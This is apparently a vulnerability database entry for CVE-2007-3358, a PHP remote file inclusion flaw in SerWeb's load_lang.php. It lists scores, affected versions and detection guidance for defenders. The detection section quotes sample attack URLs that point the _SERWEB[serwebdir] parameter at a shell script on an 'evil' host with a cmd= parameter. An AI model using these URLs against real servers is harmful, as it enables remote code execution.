cbcvebase.
CVE-2007-3358
published 2007-06-22

CVE-2007-3358: PHP remote file inclusion vulnerability in html/load_lang.php in SerWeb 0.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in…

PriorityP354medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
68.01%
99.2th percentile
PHP remote file inclusion vulnerability in html/load_lang.php in SerWeb 0.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _SERWEB[serwebdir] parameter.

Affected

2 ranges
VendorProductVersion rangeFixed in
iptelserweb<= 0.9.6
iptelserweb<= 2.0.0dev1

Detection & IOCsextracted from sources · hover to see the quote

pathhtml/load_lang.php
urlhttp://site.com/[path]/load_lang.php?_SERWEB[serwebdir]=[Evil_Script]
path/load_lang.php
  • Monitor HTTP requests to load_lang.php containing a URL (http:// or https://) in the _SERWEB[serwebdir] GET parameter, which indicates remote file inclusion exploitation.
  • The exploit appends a trailing '?' and a 'cmd' parameter to the injected shell URL (e.g., ?_SERWEB[serwebdir]=http://evil/cmd.txt?&cmd=<command>), which can be used as a detection pattern in web server logs.
  • The exploit is implemented as a Perl LWP::Simple HTTP client issuing GET requests; look for automated sequential requests to load_lang.php with varying cmd= values from the same source IP.
  • ·The vulnerability affects SerWeb 0.9.6 and earlier (including 0.9.4); the exploit targets the publicly available tarball from the iptel.org FTP server.
  • ·The NVD entry specifies the vulnerable file path as html/load_lang.php, while the exploit targets /load_lang.php directly — the actual web-accessible path may vary depending on deployment configuration.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.